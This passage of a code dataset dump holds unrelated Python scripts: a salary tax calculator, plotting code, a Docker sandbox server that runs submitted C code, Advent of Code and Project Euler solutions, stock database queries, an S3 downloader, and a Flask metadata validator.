sys\n'''\n01. Read the salary amounts from argv at runtime and validate them; define the function get_salary, which returns the salary_list dict\n02. From each salary, compute the taxable income (= salary - social insurance contributions (1-0.165) - tax-free threshold (3500 yuan)); define the function get_taxable_income\n03. Compute the tax due (= taxable income × tax rate - quick deduction); get_income\n'''\n\ndef get_salary():\n strings = sys.argv[1:]\n salary_list = {}\n try:\n for string in strings:\n id = int(string.split(\":\")[0])\n salary = int(string.split(\":\")[1])\n salary_list[id] = salary\n except (IndexError, ValueError):\n raise Exception(\"Salary Input Error!!!\")\n return salary_list\n\ndef get_social(salary):\n # Pension: 8% Medical: 2% Unemployment: 0.5% Work injury: 0% Maternity: 0% Housing fund: 6%\n social_rate = 0.08 + 0.02 + 0.005 + 0.06\n social_insurance = social_rate * salary # total social insurance contributions\n return social_insurance \n\ndef get_tax_rate(taxable_income):\n if taxable_income < 0:\n tax = 0\n deduction = 0\n elif taxable_income < 1500:\n tax = 0.03\n deduction = 0\n elif taxable_income < 4500:\n tax = 0.1\n deduction = 105\n elif taxable_income < 9000:\n tax = 0.2\n deduction = 555\n elif taxable_income < 35000:\n tax = 0.25\n deduction = 1005\n elif taxable_income < 55000:\n tax = 0.3\n deduction = 2755\n elif taxable_income < 80000:\n tax = 0.35\n deduction = 5505\n else:\n tax = 0.45\n deduction = 13505\n \n return tax,deduction\n\ndef get_income():\n threshold = 3500 # tax-free threshold\n # taxable income\n\n salary_list = get_salary()\n for id,salary in salary_list.items():\n social_pay = get_social(salary)\n taxable_income = salary - social_pay - threshold\n tax_rate = get_tax_rate(taxable_income)[0]\n deduction = get_tax_rate(taxable_income)[1]\n tax = taxable_income*tax_rate - deduction\n income = salary - social_pay - tax\n print(\"{}:{:.2f}\".format(id,income))\n\nif __name__ == '__main__':\n get_income()","sub_path":"week01/社保计算 - 函数/calculator-func.py","file_name":"calculator-func.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"230345989","text":"import numpy as np\nimport pylab as pl\n\ndata = np.loadtxt(\"correlation.dat\",delimiter=',',unpack=True)\nbars = np.loadtxt(\"corrstandev.dat\",delimiter=',',unpack=True)\nyrange = np.arange(0,len(data[0]),1)\n\ndim = len(data)\n\n#Set up 2 subplots in a column\nfig,axs = pl.subplots(nrows=2,ncols=1,sharex=True)\n\nax = axs[0]\nax.errorbar(x=yrange, y=data[0], yerr = bars[0], fmt='.')\n\nfor i in range(1,dim):\n ax = axs[1]\n ax.errorbar(x=yrange, y=data[i], yerr = bars[i], fmt='')\n ax.axhline(y=0,color='k',)\n\npl.xlim([-0.5,len(data[0])-0.5])\nfig.suptitle('O('+str(dim)+') Correlators')\npl.show()\n\n\n","sub_path":"Sigma_Model/plotcorr.py","file_name":"plotcorr.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"255699306","text":"from executors.cexecutor import CExecutor\nimport socket\nimport signal\nfrom time import time, sleep\n\ndef alarm_handler(signum,frame):\n raise TimeoutError('Timeout!')\n\ndef make_block(msg):\n return msg + '\\0' * (4096-len(msg))\n\ndef main():\n #Set alarm to exit program\n max_time = 60\n signal.signal(signal.SIGALRM, alarm_handler)\n signal.alarm(int(max_time))\n\n try:\n #set up socket\n host = ''\n port = 4000\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serversocket.bind((host, port))\n serversocket.listen(1) # become a server socket, maximum 1 connection\n msg = ''\n BLOCK_SIZE = 4096 #send/recv message size\n\n #block until a connection is made\n connection, address = serversocket.accept()\n \n #reset alarm for 10 seconds\n 
signal.alarm(10)\n\n #get compiler flags and code, remove any null bytes from packing\n for i in range(0,2):\n msg += connection.recv(BLOCK_SIZE).decode(\"utf-8\").replace('\\0','')\n \n ind = msg.index('\\n')\n\n with open(\"flags.txt\",\"w\") as f:\n f.write(msg[:ind])\n\n with open(\"code.c\",\"w\") as f:\n f.write(msg[ind:])\n\n codex = CExecutor()\n codex.execute()\n connection.send(bytes(codex.log,\"utf-8\"))\n except TimeoutError:\n serversocket.close()\n raise SystemExit\n except OSError as ose:\n print(ose)\n finally:\n serversocket.close()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"spikes/Docker/current/docker-builds/starters/start_c.py","file_name":"start_c.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"561497418","text":"import wx\nimport wx.lib.agw.aui as aui\nfrom include.utils import dict2\nclass Page(object):\n\tdef __init__(self, parent, mgr, refs):\n\t\tself.parent=parent\n\t\tself.mgr=mgr\n\t\tself.refs= refs\n\n\tdef detachWin(self, winkey, winname):\n\t\tmgr=self.mgr\n\t\tref= self.refs[winkey][winname]\n\t\tpane= mgr.GetPane(ref)\n\t\t\n\t\tif pane.IsOk():\n\t\t\tpane.Show(False)\n\t\t\tmgr.DetachPane(ref)\n\n\t\tif 1: \n\t\t\tref.Show(False)\n\n\tdef attachWin(self,win, winkey,winname):\n\t\t\n\t\tif winkey not in self.refs: self.refs[winkey] = {}\n\t\t\n\t\tif 1:\n\t\t\tif winname not in self.refs[winkey] :\n\t\t\t\tself.refs[winkey][winname] = win\n\t\t\telse: \n\t\t\t\twin = self.refs[winkey][winname]\n\t\t\t\twin.Show(True)\n\t\t\t\n\tdef load_page(self):\n\t\t\n\t\t#\n\t\t#Logger | tools\\LogCtrl.py.LogCtrl\t\n\t\t#\n\t\tfrom tools.LogCtrl import runTest\n\t\t\t\n\t\twinname\t= 'Logger'\n\t\twinkey\t= r'tools\\LogCtrl.py.LogCtrl'\n\t\twin = parent=runTest(parent=self.parent, name=winname, lineno=0, layout_fn ='Lib\\Isle\\Rack\\MVC\\_layout\\Logger.json' , pref = dict2(lid = '0',iid = '0',rid = '0',sid = '0',bid = '1586023493',cid = '1584136252',pid = '1586014312') )\n\t\tself.attachWin(win, winkey,winname)\n\t\t\n\t\tself.mgr.AddPane(win,aui.AuiPaneInfo().Center().Layer(1).\n\t\tBestSize(wx.Size(-1,-1)).MinSize(wx.Size(-1,-1)).CaptionVisible(True).Caption(\"Logger\").\n\t\tCloseButton(False).Name(\"Logger\"))","sub_path":"_build/Lib-Isle-Rack-MVC-_layout-Logger.py","file_name":"Lib-Isle-Rack-MVC-_layout-Logger.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457073914","text":"import copy\nimport re\n\n\nclass Day16:\n\n # started 0:02 after\n def __init__(self, data):\n self.raw_data = data\n self.ticket_types = {}\n self.your_ticket = \"\"\n self.nearby_tickets = []\n self.valid_tickets = []\n\n self.valid_chart = {}\n self.load_data()\n\n def solve_part1(self):\n # print(self.ticket_types)\n # print(self.your_ticket)\n # print(self.nearby_tickets)\n\n invalid_sum = 0\n for t in self.nearby_tickets:\n for n in t:\n if not self.valid_number(n):\n invalid_sum += n\n\n print(f\"Scanning Error Rate: {invalid_sum}\")\n\n def valid_number(self, num):\n for _, ticket_type_ranges in self.ticket_types.items():\n for r in ticket_type_ranges:\n if num >= r[0] and num <= r[1]:\n return True\n return False\n\n def solve_part2(self):\n for t in self.ticket_types.keys():\n self.valid_chart[t] = [1] * len(self.your_ticket)\n\n for t in self.nearby_tickets:\n valid = True\n for n in t:\n if not self.valid_number(n):\n valid = False\n if valid:\n 
self.valid_tickets.append(t)\n\n print(\n f\"Nearby Tickets: {len(self.nearby_tickets)}, Valid: {len(self.valid_tickets)}\"\n )\n\n # Also append our ticket:\n self.valid_tickets.append(self.your_ticket)\n\n for t in self.valid_tickets:\n for col, n in enumerate(t):\n mapping = self.valid_for(n)\n\n for tt, valid in mapping.items():\n if valid == 0:\n self.valid_chart[tt][col] = 0\n print(f\"Ticket {t} column {col}={n} Mapping: {mapping}\")\n\n print(f\"Valid chart: {self.valid_chart}\")\n\n col_to_type_mapping = {}\n current_chart = copy.deepcopy(self.valid_chart)\n\n while len(current_chart) > 0:\n # print(f\"Current chart: {current_chart}\")\n next_type, next_col = self.find_next_unique_match(current_chart)\n col_to_type_mapping[next_type] = next_col\n # Clear chart of used column:\n for _, mapping in current_chart.items():\n mapping[next_col] = 0\n\n print(f\"{next_type} => {next_col}\")\n del current_chart[next_type]\n\n print(f\"Mapping: {col_to_type_mapping}\")\n values = 1\n for tt, col in col_to_type_mapping.items():\n if tt.startswith(\"departure\"):\n your_ticket_value = self.your_ticket[col]\n print(\n f\"{tt} = {col}, {your_ticket_value} x {values} = {values * your_ticket_value}\"\n )\n values *= your_ticket_value\n\n print(f\"Departure values multiplied: {values}\")\n\n def find_next_unique_match(self, chart):\n for tt, mapping in chart.items():\n if sum(mapping) == 1:\n col = mapping.index(1)\n return tt, col\n print(f\"COULD NOT FIND UNIQUE MATCH! Chart: {chart}\")\n\n # def merge_mapping(self, m1, m2):\n # merged = {}\n # for k in m1:\n # merged[k] = m1[k] * m2[k]\n\n def valid_for(self, num):\n mapping = self.make_mapping()\n for tt, ticket_type_ranges in self.ticket_types.items():\n valid = False\n for r in ticket_type_ranges:\n if num >= r[0] and num <= r[1]:\n valid = True\n if not valid:\n mapping[tt] = 0\n return mapping\n\n def make_mapping(self):\n mapping = {}\n for tt in self.ticket_types.keys():\n mapping[tt] = 1\n return mapping\n\n def load_data(self):\n section = 0\n\n for line in self.raw_data:\n if line == \"\":\n continue\n elif line == \"your ticket:\":\n section = 1\n continue\n elif line == \"nearby tickets:\":\n section = 2\n continue\n\n print(f\"S{section} {line}\")\n if section == 0:\n self.add_ticket_type(line)\n elif section == 1:\n self.add_your_ticket(line)\n elif section == 2:\n self.add_nearby_ticket(line)\n\n def add_your_ticket(self, line):\n \"\"\"\n your ticket:\n 7,1,14\n \"\"\"\n self.your_ticket = [int(d) for d in line.split(\",\")]\n\n def add_nearby_ticket(self, line):\n\n \"\"\"\n nearby tickets:\n 7,3,47\n 40,4,50\n 55,2,20\n 38,6,12\n \"\"\"\n self.nearby_tickets.append([int(d) for d in line.split(\",\")])\n\n def add_ticket_type(self, line):\n ticket_type_pattern = re.compile(r\"^([\\w ]+): (\\d+)-(\\d+) or (\\d+)-(\\d+)\")\n \"\"\"\n class: 1-3 or 5-7\n row: 6-11 or 33-44\n seat: 13-40 or 45-50\n \"\"\"\n ticket_data = ticket_type_pattern.match(line)\n self.ticket_types[ticket_data[1]] = (\n (int(ticket_data[2]), int(ticket_data[3])),\n (int(ticket_data[4]), int(ticket_data[5])),\n )\n","sub_path":"day16/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"292616887","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 9 10:37:57 2018\r\n\r\n@author: js-wxyu\r\n\"\"\"\r\n\r\nimport time\r\nimport numpy as np\r\nstart=time.time()\r\nwith open('Q11.txt') as file_object:\r\n 
lines=file_object.readlines()\r\n\r\n#Read the data from the file and store it as an ndarray\r\nI=len(lines)\r\nJ=(len(lines[0])+1)//3\r\nNum=np.zeros([I,J])\r\nfor i in range(I):\r\n k=0\r\n while len(lines[i][3*k:])>1:\r\n Num[i][k]=int(lines[i][3*k:3*k+2])\r\n k+=1\r\nMul=np.zeros(Num.shape)\r\nfor i in range(I):\r\n for j in range(J):\r\n multip=[0,0,0,0]\r\n #straight down\r\n if I-i>3:\r\n multip[1]=Num[i][j]*Num[i+1][j]*Num[i+2][j]*Num[i+3][j]\r\n #down-left\r\n if I-i>3 and j>=3:\r\n multip[0]=Num[i][j]*Num[i+1][j-1]*Num[i+2][j-2]*Num[i+3][j-3]\r\n #straight right\r\n if J-j>3:\r\n multip[3]=Num[i][j]*Num[i][j+1]*Num[i][j+2]*Num[i][j+3]\r\n #down-right\r\n if I-i>3 and J-j>3:\r\n multip[2]=Num[i][j]*Num[i+1][j+1]*Num[i+2][j+2]*Num[i+3][j+3]\r\n Mul[i][j]=np.max(multip)\r\nprint(np.max(Mul))\r\nprint(time.time()-start)\r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"Q11.py","file_name":"Q11.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"146212379","text":"#!/usr/bin/python\nimport sqlite3\nimport sys\n\nDB_FILE = '/app/hickoryStrats/hickory/db/stock_us_db.dat'\nF_TURNOVER = '_3MONTH_AVG_TURNOVER'\nF_RELATIVE_MAP = {'1m':'_1MONTH_HSI_RELATIVE', '3m':'_3MONTH_HSI_RELATIVE', '1y':'_52WEEK_HSI_RELATIVE'}\nLIMIT_MKT_CAP = 0.5 * 100000000\nLIMIT_TURNOVER = 0 * 1000000\nLIMIT_HOT = \"120\"\nTHRESHOLD_RS = \"30\"\n\ndef init():\n\n conn = sqlite3.connect(DB_FILE)\n\n print(\"Opened database successfully\")\n \n conn.close()\n \ndef get_hot_stocks_where_sql(period):\n\n where_sql = (\" from stocks_us_tech, stocks_us where stocks_us.code = stocks_us_tech.code and \"\n + F_TURNOVER + \" >= ? and stocks_us_tech.MARKET_CAPITAL > ? and \"\n + F_RELATIVE_MAP[period] + \" > \" + THRESHOLD_RS\n + \" order by \" + F_RELATIVE_MAP[period] + \" desc limit \" + LIMIT_HOT)\n \n return where_sql\n\ndef get_hot_stocks_code(period):\n\n conn = sqlite3.connect(DB_FILE)\n\n stocks_us = []\n\n if (period in F_RELATIVE_MAP):\n\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP)\n sql = (\"select stocks_us.code\"\n + get_hot_stocks_where_sql(period) + \";\")\n\n elif (period == \"ALL\"):\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP)\n\n sql = (\"select code from (\"\n + \"select * from (Select stocks_us.code\"\n + get_hot_stocks_where_sql(\"1m\") + \") \"\n + \" UNION \"\n + \"select * from (Select stocks_us.code\"\n + get_hot_stocks_where_sql(\"3m\") + \") \"\n + \"UNION \"\n + \"select * from (Select stocks_us.code\"\n + get_hot_stocks_where_sql(\"1y\") + \") \"\n + \" );\")\n \n c = conn.cursor()\n c.execute(sql, t)\n\n stocks_us = [row[0] for row in c.fetchall()]\n\n #print(\"Size: \" + str(len(stocks_us)))\n return stocks_us\n\n\ndef get_hot_stocks_by_industry(industry, period=\"ALL\"):\n\n conn = sqlite3.connect(DB_FILE)\n\n stocks_us = []\n\n if (period in F_RELATIVE_MAP):\n\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, industry)\n sql = (\"select * from (select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.*\"\n + get_hot_stocks_where_sql(period) + \" ) where INDUSTRY_LV2 = ? 
order by \" + F_RELATIVE_MAP[period] + \";\")\n\n elif (period == \"ALL\"):\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, industry)\n \n sql = (\"select * from (\"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.* \"\n + get_hot_stocks_where_sql(\"1m\") + \") \"\n + \" UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.* \"\n + get_hot_stocks_where_sql(\"3m\") + \") \"\n + \"UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.* \"\n + get_hot_stocks_where_sql(\"1y\") + \") \"\n + \" ) where industry_lv2 = ? order by \" + F_RELATIVE_MAP[\"1y\"] + \" DESC, \" \n + F_RELATIVE_MAP[\"3m\"] + \" DESC, \" + F_RELATIVE_MAP[\"1m\"] + \" DESC;\")\n\n #print(sql)\n c = conn.cursor()\n c.execute(sql, t)\n \n # get column names\n names = [d[0] for d in c.description]\n stocks_us = [dict(zip(names, row)) for row in c.fetchall()]\n \n #print(len(stocks_us)) \n return stocks_us\n\ndef get_hot_industries(period):\n\n conn = sqlite3.connect(DB_FILE)\n\n industry = []\n\n if (period in F_RELATIVE_MAP):\n\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP)\n sql = (\"select industry_lv2, count(1) as count from (select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \" \n + F_RELATIVE_MAP[period] + get_hot_stocks_where_sql(period) + \" ) group by industry_lv2 order by count desc;\")\n \n rows = conn.execute(sql, t)\n for row in rows:\n industry.append(row[0])\n \n elif (period == \"ALL\"):\n #print(\"Get All...\")\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP)\n \n sql = (\"select industry_lv2, count(1) as count from (\"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \"\n + F_RELATIVE_MAP['1m'] + \",\" + F_RELATIVE_MAP['3m'] + \",\" + F_RELATIVE_MAP['1y']\n + get_hot_stocks_where_sql(\"1m\") + \") \"\n + \" UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \"\n + F_RELATIVE_MAP[\"1m\"] + \",\" + F_RELATIVE_MAP[\"3m\"] + \",\" + F_RELATIVE_MAP[\"1y\"]\n + get_hot_stocks_where_sql(\"3m\") + \") \" \n + \"UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \"\n + F_RELATIVE_MAP[\"1m\"] + \",\" + F_RELATIVE_MAP[\"3m\"] + \",\" + F_RELATIVE_MAP[\"1y\"]\n + get_hot_stocks_where_sql(\"1y\") + \") \" \n + \" ) group by industry_lv2 order by count desc;\")\n #print(sql)\n rows = conn.execute(sql, t)\n for row in rows:\n industry.append(row[0])\n \n conn.close()\n \n return industry\n\ndef main(args):\n\n if (args and args[0] == \"init\"):\n init()\n\n #print(get_hot_industries(\"1m\"))\n #print(get_hot_stocks_us_by_industry(\"公用事業\",\"1m\"))\n #print(get_hot_industries(\"1m\"))\n #print(get_hot_industries(\"3m\"))\n #print(get_hot_industries(\"1y\"))\n print(get_hot_industries(\"ALL\"))\n\n print(get_hot_stocks_by_industry(\"Oil & Gas Production\"))\n\n #print(get_hot_stocks_us_by_industry(\"公用事業\",\"1m\"))\n #print(get_hot_stocks_us_by_industry(\"公用事業\",\"ALL\"))\n\n #print(get_hot_stocks_code(\"ALL\"))\n\n '''import math\n industries = get_hot_industries(\"1m\")\n\n num_rows = math.ceil(len(industries) / 4)\n\n for i in range(0, num_rows):\n for j in range(0, 4):\n if (i*4 + j < len(industries)):\n print(\"row\" + str(i) + \" - \" + industries[i*4 + j])\n '''\n\nif __name__ == \"__main__\":\n main(sys.argv[1:]) \n 
\n\n","sub_path":"hickory/db/stock_us_sector_db.py","file_name":"stock_us_sector_db.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"307225634","text":"import argparse\nimport logging\nimport os\nimport time\n\nimport boto3\n\nfrom autofocus.util import _log_memory\n\n\ndef main(local_folder: str, bucket: str, download_tar: bool=False) -> None:\n \"\"\"Download all files in an S3 bucket locally.\n\n Args:\n local: path to save files to locally\n bucket: S3 bucket to copy locally\n download_tar: Flag for whether or not to download tar files\n \"\"\"\n client = boto3.client('s3')\n resource = boto3.resource('s3')\n download_s3_bucket(\n client=client,\n resource=resource,\n prefix='',\n local_folder=local_folder,\n bucket=bucket,\n download_tar=download_tar\n )\n\n\ndef download_s3_bucket(\n client,\n resource,\n prefix: str,\n local_folder: str,\n bucket: str,\n download_tar: bool=True\n) -> None:\n \"\"\"Download the contents of an S3 bucket, preserving the subfolder structure\n\n Args:\n client (boto3.client): boto3 S3 client\n resource (boto3.resource): boto3 S3 resource\n prefix: prefix of files in S3\n local_folder: path to save files to locally\n bucket: S3 bucket to copy locally\n download_tar: Flag for whether or not to download tar files\n \"\"\"\n print('DOWNLOAD TAR: {}'.format(download_tar))\n paginator = client.get_paginator('list_objects')\n for result in paginator.paginate(Bucket=bucket, Delimiter='/', Prefix=prefix):\n if result.get('CommonPrefixes') is not None:\n for subdir in result.get('CommonPrefixes'):\n print('Current Prefix: {}'.format(subdir.get('Prefix')))\n download_s3_bucket(\n client=client,\n resource=resource,\n prefix=subdir.get('Prefix'),\n local_folder=local_folder,\n bucket=bucket,\n download_tar=download_tar\n )\n if result.get('Contents') is not None:\n for file in result.get('Contents'):\n key = file.get('Key')\n local_path = local_folder + os.sep + key\n if 'tar.gz' in key and not download_tar:\n print('Skipping tar file: {}'.format(key))\n pass\n if not os.path.exists(os.path.dirname(local_path)):\n os.makedirs(os.path.dirname(local_path))\n resource.meta.client.download_file(bucket, key, local_path)\n\n\ndef _parse_args() -> dict:\n \"\"\"Parse command-line arguments, and log them with level INFO.\n\n Also provides file docstring as description for --help/-h.\n\n Returns:\n Command-line argument names and values as keys and values of a\n Python dictionary\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--local-folder', '-l',\n type=str,\n required=True,\n help='Path to local directory to save files to '\n )\n parser.add_argument('--bucket', '-b',\n type=str,\n required=True,\n help='s3 bucket to copy'\n )\n parser.add_argument('--download-tar', '-t',\n action='store_true',\n required=False,\n default=False,\n help='Flag of whether or not to download tar files'\n )\n args = vars(parser.parse_args())\n logging.info(f'Arguments pass at command line: {args}')\n return args\n\n\nif __name__ == '__main__':\n start_time = time.time()\n logging.basicConfig(format='%(levelname)s %(asctime)s %(message)s')\n logging.getLogger().setLevel(logging.INFO)\n args_dict = _parse_args()\n _log_memory()\n\n main(**args_dict)\n\n _log_memory()\n end_time = time.time()\n logging.info(f'Completed in {round(end_time - start_time, 2)} 
seconds')\n","sub_path":"autofocus/download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"398472682","text":"from flask import Flask, render_template, url_for, request, redirect, flash, session\nimport csv, io, os\nimport pandas as pd\nfrom werkzeug.utils import secure_filename\nfrom tablemusthave import *\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv()) ##allows me to get secret key\n\nALLOWED_EXTENSIONS = {'tsv', 'csv'}\n\n#check if period in filename and has correct extensions\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nchop_mandatory = [\n \"SampleID\",\n \"investigator\",\n \"project_name\",\n \"sample_type\",\n \"tube_barcode\",\n \"box_id\",\n \"box_position\",\n \"study_group\",\n \"date_collected\"\n]\n\nchop_suggested = [\n \"subject_id\",\n \"host_species\",\n \"study_day\",\n \"current_antibiotics\",\n \"recent_antibiotics\",\n \"cage_id\",\n \"mouse_strain\"\n]\n\nsample_type_list = [\n \"Amnoitic fluid\",\n \"BAL\",\n \"Bedding\",\n \"Biofilm\",\n \"Bioreactor\",\n \"Blank swab\",\n \"Blood\",\n \"Breast milk\",\n \"Buffer\",\n \"Cecum\",\n \"Cell lysate\",\n \"Cervical swab\",\n \"Cheek swab\",\n \"Crop\",\n \"Dental plaque\",\n \"Duodenum\",\n \"Dust\",\n \"Elution buffer\",\n \"Empty well\",\n \"Endometrial swab\",\n \"Environmental control\",\n \"Esophageal biopsy\",\n \"Esophagus\",\n \"Feces\",\n \"Feed\",\n \"Fistula\",\n \"Fistula swab\",\n \"Fly food\",\n \"Fruit fly\",\n \"Ileostomy fluid\",\n \"Ileum\",\n \"Kveim reagent\",\n \"Lab water\",\n \"Macular Retina\",\n \"Meconium\",\n \"Medium\",\n \"Microbial culture\",\n \"Mock DNA\",\n \"Mouse chow\",\n \"Nasal swab\",\n \"Nasopharyngeal swab\",\n \"Oral swab\",\n \"Oral wash\",\n \"Oropharyngeal swab\",\n \"Ostomy fluid\",\n \"Pancreatic fluid\",\n \"PCR water\",\n \"Peripheral retina\",\n \"Placenta\",\n \"Plasma\",\n \"Rectal biopsy\",\n \"Rectal swab\",\n \"Saline\",\n \"Saliva\",\n \"Sediment\",\n \"Serum\",\n \"Skin swab\",\n \"Small intestine\",\n \"Soil\",\n \"Sputum\",\n \"Surface swab\",\n \"Tongue swab\",\n \"Tonsil\",\n \"Tracheal aspirate\",\n \"Tracheal control\",\n \"Urethral swab\",\n \"Urine\",\n \"Water\",\n \"Weighing paper\",\n \"Whole gut\",\n \"Large intestine mucosa\",\n \"Large intestine lumen\",\n]\n\nhost_species_list = [\n \"Dog\",\n \"Fruit fly\",\n \"Human\",\n \"Mouse\",\n \"Naked mole rat\",\n \"Pig\",\t\n \"Pigeon\",\n \"Rabbit\",\n \"Rat\",\n \"Rhesus macaque\",\n None\n]\n\n##table to translate what these regex patterns mean\nregex_translate = {\n \"^[0-9A-Za-z._]+$\": \" only contain numbers, letters, underscores, and periods\",\n \"^[0-9A-Za-z_]+$\": \" only contain numbers, letters, and underscores\",\n \"^[A-Za-z]\": \" only start with capital or lowercase letters\",\n \"^[0-9A-Za-z._+-\\/<>=|,() ]+$\": \" only contain numbers, letters, spaces, and allowed characters inside the bracket [._+-\\/<>=|,()]\",\n \"^[0-9A-Za-z._-]+$\": \" only contain numbers, letters, periods, dashes, and underscores\",\n \"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\": \" be in format yyyy-mm-dd\",\n \"^[0-9]{2}:[0-9]{2}:[0-9]{2}$\": \" be in format hh:mm:ss\",\n \"^[A-H][0-9]{2}$\": \" only contain a letter from A-H and a number 1-12\",\n \"^[ATCGURYKMSWBDHVN]+$\": \" only contain nucleotide symbols\"\n}\n\n##function to check unique combinations for these column 
inputs\ndef uniq_comb(spec, col1, col2):\n spec.append(unique_values_for(col1, col2))\n spec.append(some_value_for(col1, col2))\n spec.append(unique_values_for(col2, col1))\n spec.append(some_value_for(col2, col1))\n\n##specification is an object of MustHave class which contains other classes that checks table by calling a function that returns AllGood or StillNeeds class (DoesntApply class is called if no such column exists in the input)\nspecification = MustHave(\n columns_named(chop_mandatory), ##must contain these columns\n columns_matching(\"^[0-9A-Za-z_]+$\"), ##column names must satisfy this regex\n values_matching(\"SampleID\", \"^[A-Za-z]\"), ##columns must satisfy this regex\n values_matching(\"SampleID\", \"^[0-9A-Za-z._]+$\"),\n unique_values_for(\"SampleID\"),\n values_in_set(\"sample_type\", sample_type_list), ##sample_type column can only contain values specified in sample_type_list\n values_matching(\"subject_id\", \"^[A-Za-z]\"),\n values_matching(\"subject_id\", \"^[0-9A-Za-z._-]+$\"),\n values_in_set(\"host_species\", host_species_list),\n some_value_for(\"host_species\", \"subject_id\"),\n some_value_for(\"subject_id\", \"host_species\"),\n some_value_for(\"mouse_strain\", \"cage_id\"), ##if mouse_strain is given, a cage_id for that sample must be provided\n values_matching(\"date_collected\", \"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\"),\n values_matching(\"time_collected\", \"^[0-9]{2}:[0-9]{2}:[0-9]{2}$\"),\n unique_values_for(\"barcode\"),\n values_matching(\"barcode\", \"^[ATCGURYKMSWBDHVN]+$\"),\n values_matching(\"reverse_barcode_location\", \"^[A-H][0-9]{2}$\"),\n values_matching(\"forward_barcode_location\", \"^[A-H][0-9]{2}$\"),\n)\n\nuniq_comb(specification, \"box_id\", \"box_position\")\nuniq_comb(specification, \"reverse_barcode_plate\", \"reverse_barcode_location\")\nuniq_comb(specification, \"forward_barcode_plate\", \"forward_barcode_location\")\n\nspecification.extend(some_value_for(c) for c in chop_mandatory) ##these columns cannot be empty\nspecification.extend(values_matching(c, \"^[0-9A-Za-z._+-/<>=,()\\[\\] ]+$\") for c in (chop_mandatory + chop_suggested)) ##all columns must satisfy the regex\n\nfor d in specification.descriptions():\n print(d)\n\napp = Flask(__name__)\napp.secret_key = os.environ.get('SECRET_KEY')\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n filename = \"Select file ...\"\n if request.method == 'GET':\n return render_template('index.html', filename=filename)\n elif request.method == 'POST':\n ##check if post request has a file\n if 'metadata_upload' not in request.files:\n flash('Please select a file')\n return redirect(request.url)\n file_fp = request.files['metadata_upload']\n ##check if user submitted a file\n if file_fp.filename == '':\n flash('No file selected')\n return redirect(request.url)\n if file_fp and not allowed_file(file_fp.filename):\n filename = secure_filename(file_fp.filename)\n if(filename.rsplit('.', 1)[1].lower() in ['xls', 'xlsx']):\n flash('Please export your excel file as .csv or .tsv first')\n return redirect(request.url) \n else:\n flash('Please use the allowed file extensions for the metadata {.tsv, .csv}')\n return redirect(request.url)\n ##check if file was submitted and if it has correct extensions\n if file_fp and allowed_file(file_fp.filename):\n filename = secure_filename(file_fp.filename)\n delim = ','\n\n ##convert FileStorage to StringIO to read as csv/tsv object\n string_io = io.StringIO(file_fp.read().decode('utf-8-sig'), newline=None)\n if(filename.rsplit('.', 1)[1].lower() == 'tsv'):\n 
